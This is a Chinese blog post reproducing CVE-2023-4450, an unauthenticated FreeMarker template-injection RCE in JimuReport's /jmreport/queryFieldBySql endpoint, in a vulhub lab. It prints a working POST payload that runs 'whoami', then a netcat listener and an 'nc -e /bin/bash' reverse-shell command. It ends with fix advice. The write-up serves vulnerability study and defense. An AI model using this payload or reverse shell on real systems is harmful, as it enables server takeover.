[CVE-2023-4450]Jeect-boot queryFieldBySql接口RCE漏洞漏洞复现

Jeect-boot queryFieldBySql接口RCE漏洞复现
最新推荐文章于 2025-11-09 16:04:11 发布
原创 最新推荐文章于 2025-11-09 16:04:11 发布 · 1.6k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #web安全

一、基本信息

  • 漏洞名称:Jeect-boot queryFieldBySql接口RCE漏洞

  • 漏洞编号:CVE-2023-4450

  • 漏洞等级:高

  • 报告日期:2024/12/9

  • 复现环境:kali2023

  • 受影响版本:JimuReport < 1.6.1

二、漏洞描述

JimuReport 是基于 Java 语言开发的,使用了多种开源技术栈。jeect-boot积木报表由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生,攻击者可以通过发送特定的POST请求到/jeecg-boot/jmreport/queryFieldBySql接口,其中包含恶意的SQL语句,利用Freemarker解析执行任意代码

三、复现步骤

  1. 准备复现环境

    • 选择两台虚拟机器,一台作为靶机

      ip:192.168.80.129 ubentu

      192.168.80.131 kali

选择vulhub的漏洞环境

docker-compose up -d
 
 
 
   
 另一台作为攻击机使用nc反弹shell 


docker-compose up -d
   
 物理机则使用yakit对调用目标接口发包实现执行命令的目

  1. 复现步骤

    1. 步骤一环境拉取:先在kali中拉取docker-compose,注意需要占用kali的5005和8085以及3306端口,端口占用会导致拉取失败

    2. 步骤二:在物理机中访问 虚拟机ip/8085端口进入设计文档页面

    3. 步骤三:使用yakit向网站进行抓包改包发包,验证漏洞的存在性

      payload:

      POST /jmreport/queryFieldBySql HTTP/1.1
Host: ip/8085
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 100
​
{"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"whoami\")}'" }

      验证得出确实存在任意命令执行漏洞,此处执行解析了whoami的命令

    4. 步骤四:在ubentu22中执行,用以监听getshell

      nc -lvp 8888

    5. 步骤五:将yakit发包中的命令whoami改为

      nc -e  /bin/bash ip 端口

      用以执行反弹shell

  2. 触发漏洞

    • 预期结果:

    此外,我选择尝试进行sql语句创建用户看看是否有通过sql系统控制服务器的可能

行不通,可能是不同版本开发者对于这个接口请求设置的权限不同?

五、修复建议

  1. 过滤输入:对表名和字段名进行严格过滤,防止攻击者构造恶意请求。可以使用正则表达式过滤非法字符或采用白名单限制用户只能输入预定义的表名和字段名。

  2. 更新组件:确保JimuReport组件更新到最新版本,以修复已知的漏洞。

  3. 安全审计:定期进行代码审计和安全测试,确保及时发现并修复潜在的安全问题。

  4. 权限控制:加强对API接口的权限控制,确保只有授权用户可以访问敏感接口

六、参考资料

青河与共
关注
JeecgBoot jmreport/queryFieldBySql RCE漏洞复现
0xSec
12-12 3665
Jeecg Boot jmreport/queryFieldBySql接口存在代码执行漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
JeecgBoot JimuReport testConnection RCE漏洞复现
0xSec
12-12 3257
JeecgBoot 的 jeecg-boot/jmreport/testConnection 未进行身份验证,并且未对 dbUrl 参数进行限制,当应用端存在H2数据库驱动依赖时,攻击者发送包含恶意 dbUrl 参数的 http 请求远程执行任意代码。
jeect-boot积木报表 queryFieldBySql接口RCE漏洞CVE-2023-4450
qq_23003811的博客
07-23 2122
jeect-boot积木报表由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。1、RCE任意命令执行。
jeect-boot RCE漏洞CVE-2023-4450
zneVue
07-17 3123
JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API`/jmreport/queryFieldBySql`使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
Web安全】JeecgBoot框架SRC高频漏洞分析总结
最新发布
水滴石穿
11-09 1548
JeecgBoot是国内主流的开源低代码开发平台,基于Spring Boot、MyBatis-Plus、Vue3等技术栈构建,涵盖快速开发、表单设计、报表统计、流程引擎等核心功能,广泛应用于政府、企业、互联网等领域,承担业务系统快速搭建、数据管理、协同办公等关键任务。
漏洞防御实录:CVE-2023-XXXX远程代码执行漏洞修复指南
介绍各种好的开源工具!
05-20 1548
2023年全球曝光的多个高危RCE漏洞(如CVE-2023-21768、CVE-2023-21839等)表明,此类漏洞的利用门槛正在降低,而防御复杂度却在持续攀升。• 紧急修复:针对已公开利用的漏洞(如CVE-2023-21839),直接应用厂商补丁。• 协议解析错误:如CVE-2023-21839(Weblogic T3/IIOP协议漏洞),恶意序列化数据触发远程类加载。• 权限管理失效:如CVE-2023-21554(MSMQ服务漏洞),未授权访问导致攻击者直接投递恶意消息队列。
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
fly夏天的博客
03-20 1万+
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
【春秋云境】CVE-2023-4450 jeect-boot queryFieldBySql接口RCE漏洞
HMX404的博客
04-15 2129
JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
CVE-2023-25157-main(1).zip
07-19
总而言之,CVE-2023-25157是一个涉及GeoServer的SQL注入漏洞,通过复现漏洞,我们可以更好地理解其风险,并采取必要的措施来保护我们的系统。提供的压缩包文件包含的信息将有助于这一过程,对于学习安全防护和提升...
漏洞复现】JeecgBoot 积木报表 queryFieldBySql sql注入漏洞
qq_48368964的博客
10-01 3176
JeecgBoot 积木报表 queryFieldBySq| 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。积木报表,是一款免费的企业级Web报表工具,像搭建积木一样在线设计报表!功能涵盖,数据报表、打印设计、图表报表、大屏设计等!title="Jeecg-Boot 快速开发平台" || body="积木报表"2、通过防火墙等安全设备设置访问策略,设置白名单访问。
[漏洞复现]JeecgBoot queryFieldBySql注入内存马利用及JDBC RCE复现
LiangYueSec的博客
07-02 4926
[漏洞复现]JeecgBoot queryFieldBySql注入内存马利用及JDBC RCE复现
JeecgBoot jmreport/loadTableData 积木报表漏洞RCE(CVE-2023-4450)漏洞
由入门到精通
07-05 1715
Jeecg Boot jmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息由于未授权的 API使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
websphere安装部署vue_CVE-2020-4450: WebSphere远程代码执行漏洞通告
weixin_39588432的博客
12-13 443
0x01 漏洞背景2020 年 06 月 08 日,360CERT监测到 IBM官方发布了 WebSphere远程代码执行 的风险通告,该漏洞编号为 CVE-2020-4450漏洞等级:高危。WebSphere Application Server 是一款由IBM 公司开发的高性能的Java 中间件服务器,可用于构建、运行、集成、保护和管理部署的动态云和Web 应用。它不仅能够确保高性能和灵活性...
JeecgBoot入门教程
热门推荐
Z丶royAl的博客
02-20 2万+
一、JeecgBoot下载 https://github.com/zhangdaiscott/jeecg-boot 二、用idea打开后端项目 三、创建数据库,用户为jeecgboot,这里我用的是oracle /*第1步:查询表空间路径*/ select * from dba_data_files where tablespace_name = 'JEE_GBLZ_NY01' /*第2步:创建数据表空间 */ create tablespace JEECGBOOT logging dat
快速又不失灵活性的JeecgBoot框架
通达的博客
06-18 5982
JeecgBoot 是一款企业级的低代码平台!前后端分离架构 SpringBoot2.x,SpringCloud,Ant Design&Vue3,Mybatis-plus,Shiro,JWT 支持微服务。强大的代码生成器让前后端代码一键生成!JeecgBoot 引领低代码开发模式 (OnlineCoding-> 代码生成 -> 手工 MERGE), 帮助解决 Java 项目 70% 的重复工作,让开发更多关注业务。既能快速提高效率,节省成本,同时又不失灵活性!
jeectboot idea 搭建运行
weixin_42362496的博客
04-27 2478
jeecgboot官网介绍更多的是webstorm+eclipse,但官方推荐使用idea 我也是看了这篇文章搭建起来的,文章原版,可参考 1.jeecgboot开发文档 2.常用的jeecg环境配置工具打包 3.使用idea导入前后台项目,打开已经下载完的项目 其中ant-design-jeecg-vue为前台,jeecg-boot为后台一并导入 一 . 后端配置 1、接下来先讲后端如何跑起来 ...
jeecg boot 企业级应用管理后台(一) 项目开发与部署 从0开始 (持续更新)
qq_46685188的博客
07-20 2766
JeecgBoot 是一款企业级的低代码平台!前后端分离架构 SpringBoot2.x,SpringCloud,Ant Design&Vue3,Mybatis-plus,Shiro,JWT 支持微服务。强大的代码生成器让前后端代码一键生成!!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值